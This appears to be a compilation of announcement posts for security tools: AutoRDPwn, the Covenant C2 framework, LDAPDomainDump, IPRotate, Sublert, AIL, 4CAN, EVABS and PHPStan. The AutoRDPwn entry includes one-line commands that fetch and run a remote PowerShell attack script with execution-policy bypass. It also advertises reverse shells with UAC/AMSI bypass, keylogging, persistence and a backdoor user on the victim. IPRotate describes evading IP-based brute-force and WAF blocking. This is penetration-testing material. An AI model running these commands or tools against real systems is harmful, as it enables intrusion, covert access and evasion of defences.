Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support for Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely, or to pivot between computers.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on a line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



Credits and Acknowledgments
This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System by HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM by Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload by Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher by Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more that do not fit here. Thanks to all of them for their excellent work.

Contact
This software does not offer any kind of guarantee. Its use is intended exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net



Covenant - A .NET Command And Control Framework For Red Teamers


Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.



Quick-Start Guide
Please see the Installation and Startup guide to get started with Covenant!
The Wiki documents most of Covenant's core features and how to use them.

Features
Covenant has several key features that make it useful and differentiate it from other command and control frameworks:
  • Intuitive Interface - Covenant provides an intuitive web application to easily run a collaborative red team operation.
  • Multi-Platform - Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed.
  • Multi-User - Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
  • API Driven - Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
  • Listener Profiles - Covenant supports listener "profiles" that control how the network communication between Grunt implants and Covenant listeners looks on the wire.
  • Encrypted Key Exchange - Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.
  • Dynamic Compilation - Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
  • Inline C# Execution - Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
  • Tracking Indicators - Covenant tracks "indicators" throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in its infancy and still has room for improvement.
  • Developed in C# - Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion
Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.


LDAPDomainDump - Active Directory Information Dumper Via LDAP


Active Directory information dumper via LDAP

Introduction
In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information during the recon phase of a pentest of an internal network. A problem is that data from LDAP is often not available in an easy-to-read format.
ldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files.
The tool was designed with the following goals in mind:
  • Easy overview of all users/groups/computers/policies in the domain
  • Authentication via username and password, as well as with NTLM hashes (requires ldap3 >= 1.3.1)
  • Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impacket's ntlmrelayx
The tool outputs several files containing an overview of objects in the domain:
  • domain_groups: List of groups in the domain
  • domain_users: List of users in the domain
  • domain_computers: List of computer accounts in the domain
  • domain_policy: Domain policy such as password requirements and lockout policy
  • domain_trusts: Incoming and outgoing domain trusts, and their properties
As well as two grouped files:
  • domain_users_by_group: Domain users per group they are member of
  • domain_computers_by_os: Domain computers sorted by Operating System

Dependencies and installation
Requires ldap3 > 2.0 and dnspython
Both can be installed with pip install ldap3 dnspython
The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump.

Usage
There are 3 ways to use the tool:
  • With just the source, run python ldapdomaindump.py
  • After installing, by running python -m ldapdomaindump
  • After installing, by running ldapdomaindump
Help can be obtained with the -h switch:
usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}]
[-o DIRECTORY] [--no-html] [--no-json] [--no-grep]
[--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER]
[-m]
HOSTNAME

Domain information dumper via LDAP. Dumps users/computers/groups and
OS/membership information to HTML/JSON/greppable output.

Required options:
HOSTNAME Hostname/ip or ldap://host:port connection string to
connect to (use ldaps:// to use SSL)

Main options:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME
DOMAIN\username for authentication, leave empty for
anonymous authentication
-p PASSWORD, --password PASSWORD
Password or LM:NTLM hash, will prompt if not specified
-at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE}
Authentication type (NTLM or SIMPLE, default: NTLM)

Output options:
-o DIRECTORY, --outdir DIRECTORY
Directory in which the dump will be saved (default:
current)
--no-html Disable HTML output
--no-json Disable JSON output
--no-grep Disable Greppable output
--grouped-json Also write json files for grouped files (default:
disabled)
-d DELIMITER, --delimiter DELIMITER
Field delimiter for greppable output (default: tab)

Misc options:
-r, --resolve Resolve computer hostnames (might take a while and
cause high traffic on large networks)
-n DNS_SERVER, --dns-server DNS_SERVER
Use custom DNS resolver instead of system DNS (try a
domain controller IP)
-m, --minimal Only query minimal set of attributes to limit memory
usage

Options

Authentication
Most AD servers support NTLM authentication. In the rare case that it does not, use --authtype SIMPLE.
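For reference, this is roughly what an NTLM-authenticated ldap3 connection looks like in Python; the host and credentials are placeholders. A connection built this way is also the kind of pre-authenticated connection the tool can reuse, as mentioned in the introduction:

# Sketch of an NTLM-authenticated bind with ldap3 (placeholder values).
from ldap3 import Server, Connection, NTLM, ALL

server = Server('ldap://10.0.0.10', get_info=ALL)
conn = Connection(server, user='EXAMPLE\\jdoe', password='Password1',
                  authentication=NTLM)
print(conn.bind())  # True on successful authentication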

Output formats
By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already.

DNS resolving
An important option is the -r option, which decides whether a computer's DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause high load on the domain controller.

Minimizing network and memory usage
By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch.

Visualizing groups with BloodHound
LDAPDomainDump includes a utility that can be used to convert ldapdomaindump's .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert, or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool will take the users/groups/computers/trusts .json files and convert them to group_membership.csv and trust.csv, which you can add to BloodHound.


IPRotate - Extension For Burp Suite Which Uses AWS API Gateway To Rotate Your IP On Every Request

$
0
0

Extension for Burp Suite which uses AWS API Gateway to change your IP on every request.
More info: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/

Description
This extension allows you to easily spin up API Gateways across multiple regions. All the Burp Suite traffic for the targeted host is then routed through the API Gateway endpoints, which causes the IP to be different on each request. (There is a chance of an IP being recycled, but it is pretty low, and the more regions you use the smaller the chance.)
This is useful to bypass different kinds of IP-based blocking, such as brute force protection that blocks based on IP, API rate limiting based on IP, or WAF blocking based on IP.

Usage
  1. Setup Jython in Burp Suite
  2. Install the boto3 module for Python 2
    pip install boto3
  3. Ensure you have a set of AWS keys that have full access to the API Gateway service. This is available through the free tier of AWS.
  4. Insert the credentials into the fields.
  5. Insert the target domain you wish to target.
  6. Select HTTPS if the domain is hosted over HTTPS.
  7. Select all the regions you want to use. (The more you use, the larger the IP pool will be.)
  8. Click "Enable".
  9. Once you are done ensure you click disable to delete all the resources which were started.
If you want to check on the resources and endpoints that were started, or any potential errors, you can look at the output console in Burp.
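Under the hood this boils down to calling the API Gateway service in each selected region. The sketch below illustrates the first step with boto3 (valid AWS credentials are assumed); the real extension additionally configures the proxy integration, deploys each API, and deletes everything on disable, all of which is omitted here:

# Illustrative sketch: create one REST API shell per region with boto3.
# Proxy integration, deployment, and cleanup steps are omitted.
import boto3

regions = ['us-east-1', 'us-west-2', 'eu-west-1']  # more regions = larger IP pool
for region in regions:
    client = boto3.client('apigateway', region_name=region)
    api = client.create_rest_api(name='iprotate-example')
    # Each gateway fronts the target from a different regional IP range.
    print('https://%s.execute-api.%s.amazonaws.com' % (api['id'], region))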

The Burp UI


Example of how the requests look


Setup
Make sure you have Jython installed and add IPRotate.py through the Burp Extension options.


Previous Research
After releasing this extension it was pointed out that there has been other research in this area using AWS API Gateway to hide an IP address. There is some awesome research and tooling by @ustayready, @ryHanson, and @rmikehodges using this technique.
Be sure to check them out too:
https://github.com/ustayready/fireprox
https://github.com/rmikehodges/hideNsneak


Sublert - Security And Reconnaissance Tool Which Leverages Certificate Transparency To Automatically Monitor New Subdomains Deployed By Specific Organizations And Issued TLS/SSL Certificate


Sublert is a security and reconnaissance tool, written in Python, that leverages certificate transparency for the sole purpose of monitoring new subdomains deployed by specific organizations and issued TLS/SSL certificates. The tool is meant to be scheduled to run periodically at fixed times, dates, or intervals (ideally each day). Newly identified subdomains will be sent to a Slack workspace with a push notification. Furthermore, the tool performs DNS resolution to determine working subdomains.

Requirements
  • Virtual Private Server (VPS) running on Unix. (I personally use DigitalOcean)
  • Python 2.x or 3.x.
  • Free Slack workspace.

Installation & Configuration
Please refer to the article below for a detailed technical explanation:

Usage
Short Form   Long Form    Description
-u           --url        Adds a domain to monitor. E.g: yahoo.com.
-d           --delete     Domain to remove from the monitored list. E.g: yahoo.com.
-a           --list       Listing all monitored domains.
-t           --threads    Number of concurrent threads to use (Default: 20).
-r           --resolve    Perform DNS resolution.
-l           --logging    Enable Slack-based error logging.
-m           --reset      Reset everything.

Feedback and issues?
If you have any feedback, anything that you want to see implemented or running into issues using Sublert, please feel free to file an issue on https://github.com/yassineaboukir/sublert/issues


Airgeddon v9.21 - A Multi-use Bash Script for Linux Systems to Audit Wireless Networks


AIL Framework - Framework for Analysis of Information Leaks


AIL is a modular framework to analyse potential information leaks from unstructured data sources like pastes from Pastebin or similar services or unstructured data streams. AIL framework is flexible and can be extended to support other functionalities to mine or process sensitive information (e.g. data leak prevention).



Features
  • Modular architecture to handle streams of unstructured or structured information
  • Default support for external ZMQ feeds, such as those provided by CIRCL or other providers (see the subscriber sketch after this list)
  • Multiple feed support
  • Each module can process and reprocess the information already processed by AIL
  • Detecting and extracting URLs including their geographical location (e.g. IP address location)
  • Extracting and validating potential leaks of credit card numbers, credentials, ...
  • Extracting and validating leaked email addresses, including DNS MX validation
  • Module for extracting Tor .onion addresses (to be further processed for analysis)
  • Keeps track of duplicates (and diffing between each duplicate found)
  • Extracting and validating potential hostnames (e.g. to feed Passive DNS systems)
  • A full-text indexer module to index unstructured information
  • Statistics on modules and web
  • Real-time modules manager in terminal
  • Global sentiment analysis for each provider based on the nltk vader module
  • Terms, Set of terms and Regex tracking and occurrence
  • Many more modules for extracting phone numbers, credentials and others
  • Alerting to MISP to share found leaks within a threat intelligence platform using MISP standard
  • Detect and decode encoded files (Base64, hex encoded or your own decoding scheme) and store them
  • Detect Amazon AWS and Google API keys
  • Detect Bitcoin address and Bitcoin private keys
  • Detect private keys, certificate, keys (including SSH, OpenVPN)
  • Detect IBAN bank accounts
  • Tagging system with MISP Galaxy and MISP Taxonomies tags
  • UI paste submission
  • Create events on MISP and cases on The Hive
  • Automatic paste export at detection on MISP (events) and The Hive (alerts) on selected tags
  • Extracted and decoded files can be searched by date range, type of file (mime-type) and encoding discovered
  • Graph relationships between decoded file (hashes), similar PGP UIDs and addresses of cryptocurrencies
  • Tor hidden services crawler to crawl and parse output
  • Tor onion availability is monitored to detect up and down of hidden services
  • Browsed hidden services are screenshotted and integrated into the analysed output, including a blurring screenshot interface (to avoid "burning the eyes" of the security analyst with specific content)
  • Tor hidden service crawling is part of the standard framework; all the AIL modules are available to the crawled hidden services
  • Generic web crawler to trigger crawling of URLs or Tor hidden services on demand or at regular intervals
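As a rough idea of what consuming a ZMQ feed looks like, here is a minimal pyzmq subscriber sketch; the endpoint and the message layout shown are illustrative assumptions, not AIL's exact defaults:

# Minimal ZMQ feed subscriber sketch (endpoint and message format are
# illustrative assumptions, not AIL's exact defaults).
import base64
import zmq

context = zmq.Context()
sub = context.socket(zmq.SUB)
sub.connect('tcp://feed.example.com:5556')   # placeholder feed endpoint
sub.setsockopt(zmq.SUBSCRIBE, b'')           # subscribe to every topic

while True:
    message = sub.recv()
    # Paste feeds of this kind typically carry 'topic path base64(content)'.
    topic, path, payload = message.split(b' ', 2)
    print(path, len(base64.b64decode(payload)))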

Installation
Type these command lines for a fully automated installation and start of the AIL framework:
git clone https://github.com/CIRCL/AIL-framework.git
cd AIL-framework
./installing_deps.sh

cd ~/AIL-framework/
cd bin/
./LAUNCH.sh -l
The default installing_deps.sh is for Debian and Ubuntu based distributions.
There is also a Travis file used for automating the installation that can be used to build and install AIL on other systems.
Requirement:
  • Python 3.5+

Installation Notes
In order to use AIL combined with ZFS or unprivileged LXC it's necessary to disable Direct I/O in $AIL_HOME/configs/6382.conf by changing the value of the directive use_direct_io_for_flush_and_compaction to false.

Starting AIL
cd bin/
./LAUNCH.sh -l
You can then browse the status of the AIL framework website at the following URL:
https://localhost:7000/
The default credentials for the web interface are located in DEFAULT_PASSWORD. This file is removed when you change your password.

Training
CIRCL organises training on how to use or extend the AIL framework. AIL training materials are available at https://www.circl.lu/services/ail-training-materials/.

HOWTO
HOWTOs are available in HOWTO.md

Privacy and GDPR
The document AIL information leaks analysis and the GDPR in the context of collection, analysis and sharing information leaks provides an overview of how to use AIL in a lawful context, especially within the scope of the General Data Protection Regulation.

Research using AIL
If you write an academic paper relying on or using AIL, it can be cited with the following BibTeX:
@inproceedings{mokaddem2018ail,
  title={AIL - The design and implementation of an Analysis Information Leak framework},
  author={Mokaddem, Sami and Wagener, G{\'e}rard and Dulaunoy, Alexandre},
  booktitle={2018 IEEE International Conference on Big Data (Big Data)},
  pages={5049--5057},
  year={2018},
  organization={IEEE}
}

Screenshots

Tor hidden service crawler


Trending charts



Extracted encoded files from pastes



Browsing


Tagging system


MISP and The Hive, automatic events and alerts creation


Paste submission


Sentiment analysis


Terms manager and occurrence


Top terms



AIL framework screencast

Command line module manager



4CAN - Open Source Security Tool to Find Security Vulnerabilities in Modern Cars


Open Source Security Tool to Find Security Vulnerabilities in Modern Cars.

hardware
Tested on the following Raspbian images using a Pi 3B+.
4CAN should also work with a Pi Zero W, but using at least a Pi 3B is recommended. A heatsink on the Pi is also recommended, because the Pi can get a little toasty running 4 CAN interfaces.

install
run the install.sh script (requires sudo) to automatically install everything, and then reboot.
The install script will do the following:
  1. Copy the 4 mcp2515-canx.dtbo files to /boot/overlays
sudo mkdir /boot/overlays/bak
sudo cp /boot/overlays/mcp2515* /boot/overlays/bak
sudo cp ./dtbo/*.dtbo /boot/overlays
  2. Copy config.txt to /boot/config.txt (making a backup of the original /boot/config.txt, just in case)
sudo cp /boot/config.txt /boot/config.txt.bak
sudo cp config.txt /boot/config.txt

usage
Before using 4can, make sure that the socketcan kernel module is loaded with sudo modprobe can_dev. This shouldn't be necessary, since the Pi will load the correct kernel module based on the device tree, but it doesn't hurt to check.
Once installed, run 4can.sh to bring up the CAN interfaces: ./4can.sh
Wire up the CAN interfaces and run candump -acc any to check that they are working. Note: this requires can-utils (sudo apt install can-utils).
Note: sometimes the interfaces come up out of order; reboot the Pi and that should fix it. If not, you might have to modify /boot/config.txt.
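For reference, bringing up a single socketcan interface by hand looks something like this (a sketch assuming a 500 kbit/s bus; adjust the bitrate to match the bus you are tapping):
# bring up can0 as a CAN interface at 500 kbit/s
sudo ip link set can0 up type can bitrate 500000
# dump traffic on can0 to verify it works
candump can0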

GPIO
The 4CAN uses a number of GPIO pins on the Raspberry Pi. The GPIO pins available for use are 3, 5, 8, 10, 27, 28, 32 and 36 (physical pin numbering).
All the ground pins are tied together and can be used as ground connections. The 3.3V and 5V pins can be used to supply voltage as well.
Consult the schematic for more details.

Recommended Wiring
Remember to connect the external CAN ground to the 4can ground (the "C" connection on the screw terminal). This will ensure good ground integrity and minimize tx/rx errors.



When using the 4CAN with the HyenaPlate, the CAN wires can be routed underneath the Pi and connected to the breadboard. This is mainly for aesthetics, but other benefits include not having to constantly screw/unscrew the screw terminals to make new connections, easier troubleshooting and more stable connections.
For even more aesthetics, the resistor color code can be used to assign colors to signals. For example, in the image above:

Interface   CAN-L    CAN-H
CAN0        brown    red
CAN1        orange   yellow
CAN2        blue     violet
CAN3        green    white

Black can be used for ground.

Credit and License

IndustrialBerry
The 4CAN was inspired by and is loosely based on the IndustrialBerry QUAD CAN BUS adapter for Raspberry CanBerry. Although we modified the design to suit our needs, we must give credit to the fantastic work done by IndustrialBerry. The 4CAN, as well as the IndustrialBerry, are licensed under a Creative Commons Attribution Share-Alike license.

George Tarnovsky
Credit must also be given to George Tarnovsky, for schematic, layout, assembly, and verification!



EVABS - Extremely Vulnerable Android Labs


An open source Android application that is intentionally vulnerable, so as to act as a learning platform for Android application security beginners. The goal is to introduce beginners with very limited or zero knowledge to some of the major, commonly found real-world Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach, and in each level the player learns a new concept. This project is still in progress and aims at incorporating as many levels as possible.
For complete details and solutions, head to the wiki.

INSTALLATION
  • Download the application file (apk).
  • Install it on an Android device (rooted recommended) or an emulator.

SCREENSHOTS:


REQUIREMENTS
or use ADHRIT (all-in-one tool)
Confused? Read the documentation on setting up the environment.

CHANGE LOG
  • Flag checking module added within EVABS.
  • Alternatively, you can use this link to submit flags from your browser.
  • UI improvements

BUILDING LOCALLY
  • Clone the repository: git clone https://github.com/abhi-r3v0/EVABS.git, or download the zip.
  • Create a new folder EVABS in your AndroidStudioProjects directory and move the contents to the new directory.
  • Fire up Android Studio, File -> open and select the project.
  • Go to Build -> Generate Signed APK.
  • Create a new signature, if it doesn't exist. Sign the APK.
  • Install the APK using adb install EVABS.apk

THE SQUAD

PROJECT LEAD:

LOGO

PHPStan - PHP Static Analysis Tool (Discover Bugs In Your Code Without Running It!)


PHPStan focuses on finding errors in your code without actually running it. It catches whole classes of bugs even before you write tests for the code. It moves PHP closer to compiled languages in the sense that the correctness of each line of the code can be checked before you run the actual line.

Read more about PHPStan on Medium.com
Try out PHPStan on the on-line playground!

Prerequisites
PHPStan requires PHP >= 7.1. You have to run it in an environment with PHP 7.x, but the analysed code does not have to use PHP 7.x features. (Code written for PHP 5.6 and earlier can mostly run on 7.x unmodified.)
PHPStan works best with modern object-oriented code. The more strongly-typed your code is, the more information you give PHPStan to work with.
Properly annotated and typehinted code (class properties, function and method arguments, return types) helps not only static analysis tools but also other people that work with the code to understand it.

Installation
To start performing analysis on your code, require PHPStan in Composer:
composer require --dev phpstan/phpstan
Composer will install PHPStan's executable in its bin-dir which defaults to vendor/bin.
If you have conflicting dependencies or you want to install PHPStan globally, the best way is via a PHAR archive. You will always find the latest stable PHAR archive below the release notes. You can also use the phpstan/phpstan-shim package to install PHPStan via Composer without the risk of conflicting dependencies.
You can also use PHPStan via Docker.

First run
To let PHPStan analyse your codebase, you have to use the analyse command and point it to the right directories.
So, for example if you have your classes in directories src and tests, you can run PHPStan like this:
vendor/bin/phpstan analyse src tests
PHPStan will probably find some errors, but don't worry, your code might be just fine. Errors found on the first run tend to be:
  • Extra arguments passed to functions (e.g. a function requires two arguments, the code passes three)
  • Extra arguments passed to print/sprintf functions (e.g. the format string contains one placeholder, the code passes two values to replace)
  • Obvious errors in dead code
  • Magic behaviour that needs to be defined. See Extensibility.
After fixing the obvious mistakes in the code, look to the following section for all the configuration options that will bring the number of reported errors to zero making PHPStan suitable to run as part of your continuous integration script.

Rule levels
If you want to use PHPStan but your codebase isn't up to speed with strong typing and PHPStan's strict checks, you can choose from 8 levels (0 is the loosest and 7 is the strictest) by passing --level to the analyse command. The default level is 0.
This feature enables incremental adoption of PHPStan checks. You can start using PHPStan with a lower rule level and increase it when you feel like it.
You can also use --level max as an alias for the highest level. This will ensure that you will always use the highest level when upgrading to new versions of PHPStan. Please note that this can create a significant obstacle when upgrading to a newer version because you might have to fix a lot of code to bring the number of errors down to zero.
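For example, a gradual adoption path might look like this (using the --level flag described above):
# start lenient, fix the reported errors, then tighten
vendor/bin/phpstan analyse --level 0 src tests
vendor/bin/phpstan analyse --level 4 src tests
vendor/bin/phpstan analyse --level max src tests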

Extensibility
A unique feature of PHPStan is the ability to define and statically check the "magic" behaviour of classes - accessing properties that are not defined in the class but are created in __get and __set, and invoking methods using __call.
See Class reflection extensions, Dynamic return type extensions and Type-specifying extensions.
You can also install official framework-specific extensions:
Unofficial extensions for other frameworks and libraries are also available:
Unofficial extensions with third-party rules:
New extensions are becoming available on a regular basis!

Configuration
Config file is passed to the phpstan executable with -c option:
vendor/bin/phpstan analyse -l 4 -c phpstan.neon src tests
When using a custom project config file, you have to pass the --level (-l) option to analyse command (default value does not apply here).
If you do not provide config file explicitly, PHPStan will look for files named phpstan.neon or phpstan.neon.dist in current directory.
The resolution priority is as such:
  1. If config file is provided on command line, it is used.
  2. If config file phpstan.neon exists in current directory, it will be used.
  3. If config file phpstan.neon.dist exists in current directory, it will be used.
  4. If none of the above is true, no config will be used.
NEON file format is very similar to YAML. All the following options are part of the parameters section.

Configuration variables
  • %rootDir% - root directory where PHPStan resides (i.e. vendor/phpstan/phpstan in Composer installation)
  • %currentWorkingDirectory% - current working directory where PHPStan was executed

Configuration options
  • tmpDir - specifies the temporary directory used by PHPStan cache (defaults to sys_get_temp_dir() . '/phpstan')
  • level - specifies analysis level - if specified, -l option is not required
  • paths - specifies analysed paths - if specified, paths are not required to be passed as arguments (a minimal config combining these options is sketched below)
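A minimal phpstan.neon combining these options might look like this (a sketch using only the parameters described above):
parameters:
    level: 4
    paths:
        - src
        - tests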

Autoloading
PHPStan uses the Composer autoloader, so the easiest way to autoload classes is through the autoload/autoload-dev sections in composer.json.
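For instance, a typical composer.json autoload section looks like this (a generic Composer example; the App\ namespace is illustrative):
{
    "autoload": {
        "psr-4": {
            "App\\": "src/"
        }
    }
}
After editing it, run composer dump-autoload so the generated autoloader picks up the change.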

Specify paths to scan
If PHPStan complains about some non-existent classes and you're sure the classes exist in the codebase AND you don't want to use Composer autoloader for some reason, you can specify directories to scan and concrete files to include using autoload_directories and autoload_files array parameters:
parameters:
    autoload_directories:
        - %rootDir%/../../../build
    autoload_files:
        - %rootDir%/../../../generated/routes/GeneratedRouteList.php
%rootDir% is expanded to the root directory where PHPStan resides.

Autoloading for global installation
PHPStan supports global installation using composer global or via a PHAR archive. In this case, it's not part of the project autoloader, but it supports autodiscovery of the Composer autoloader from the current working directory, residing in vendor/:
cd /path/to/project
phpstan analyse src tests # looks for autoloader at /path/to/project/vendor/autoload.php
If you have your dependencies installed at a different path or you're running PHPStan from a different directory, you can specify the path to the autoloader with the --autoload-file|-a option:
phpstan analyse --autoload-file=/path/to/autoload.php src tests

Exclude files from analysis
If your codebase contains some files that are broken on purpose (e.g. to test the behaviour of your application on files with invalid PHP code), you can exclude them using the excludes_analyse array parameter. The string on each line is used as a pattern for the fnmatch function.
parameters:
    excludes_analyse:
        - %rootDir%/../../../tests/*/data/*

Include custom extensions
If your codebase contains PHP files with extensions other than the standard .php extension, you can add them to the fileExtensions array parameter:
parameters:
    fileExtensions:
        - php
        - module
        - inc

Universal object crates
Classes without predefined structure are common in PHP applications. They are used as universal holders of data - any property can be set and read on them. Notable examples include stdClass, SimpleXMLElement (these are enabled by default), objects with results of database queries etc. Use universalObjectCratesClasses array parameter to let PHPStan know which classes with these characteristics are used in your codebase:
parameters:
    universalObjectCratesClasses:
        - Dibi\Row
        - Ratchet\ConnectionInterface

Add non-obviously assigned variables to scope
If you use some variables from a try block in your catch blocks, set the polluteCatchScopeWithTryAssignments boolean parameter to true.
try {
    $author = $this->getLoggedInUser();
    $post = $this->postRepository->getById($id);
} catch (PostNotFoundException $e) {
    // $author is probably defined here
    throw new ArticleByAuthorCannotBePublished($author);
}
If you are enumerating over all possible situations in if-elseif branches and PHPStan complains about undefined variables after the conditions, you can write an else branch that throws an exception:
if (somethingIsTrue()) {
    $foo = true;
} elseif (orSomethingElseIsTrue()) {
    $foo = false;
} else {
    throw new ShouldNotHappenException();
}

doFoo($foo);
I recommend leaving polluteCatchScopeWithTryAssignments set to false, because it leads to clearer and more maintainable code.

Custom early terminating method calls
The previous example showed that if a conditional branch ends by throwing an exception, that branch does not have to define a variable that is used after the conditional.
But exceptions are not the only way to terminate execution of a method early. Some specific method calls can also be perceived by project developers as early terminating - like a redirect() that stops execution by throwing an internal exception.
if (somethingIsTrue()) {
    $foo = true;
} elseif (orSomethingElseIsTrue()) {
    $foo = false;
} else {
    $this->redirect('homepage');
}

doFoo($foo);
These methods can be configured by specifying a class on whose instance they are called like this:
parameters:
    earlyTerminatingMethodCalls:
        Nette\Application\UI\Presenter:
            - redirect
            - redirectUrl
            - sendJson
            - sendResponse

Ignore error messages with regular expressions
If some issue in your code base is not easy to fix, or you simply want to deal with it later, you can exclude error messages from the analysis result with regular expressions:
parameters:
    ignoreErrors:
        - '#Call to an undefined method [a-zA-Z0-9\\_]+::method\(\)#'
        - '#Call to an undefined method [a-zA-Z0-9\\_]+::expects\(\)#'
        - '#Access to an undefined property PHPUnit_Framework_MockObject_MockObject::\$[a-zA-Z0-9_]+#'
        - '#Call to an undefined method PHPUnit_Framework_MockObject_MockObject::[a-zA-Z0-9_]+\(\)#'
To exclude an error in a specific directory or file, specify a path or paths along with the message:
parameters:
    ignoreErrors:
        -
            message: '#Call to an undefined method [a-zA-Z0-9\\_]+::method\(\)#'
            path: %currentWorkingDirectory%/some/dir/SomeFile.php
        -
            message: '#Call to an undefined method [a-zA-Z0-9\\_]+::method\(\)#'
            paths:
                - %currentWorkingDirectory%/some/dir/*
                - %currentWorkingDirectory%/other/dir/*
        - '#Other error to catch anywhere#'
If some of the patterns do not occur in the result anymore, PHPStan will let you know and you will have to remove the pattern from the configuration. You can turn off this behaviour by setting reportUnmatchedIgnoredErrors to false in PHPStan configuration.
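That switch is a plain boolean parameter (a minimal sketch):
parameters:
    reportUnmatchedIgnoredErrors: false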

Bootstrap file
If you need to initialize something in PHP runtime before PHPStan runs (like your own autoloader), you can provide your own bootstrap file:
parameters:
    bootstrap: %rootDir%/../../../phpstan-bootstrap.php

Custom rules
PHPStan allows writing custom rules to check for specific situations in your own codebase. Your rule class needs to implement the PHPStan\Rules\Rule interface and be registered as a service in the configuration file:
services:
    -
        class: MyApp\PHPStan\Rules\DefaultValueTypesAssignedToPropertiesRule
        tags:
            - phpstan.rules.rule
For inspiration on how to implement a rule, turn to src/Rules to see a lot of built-in rules.
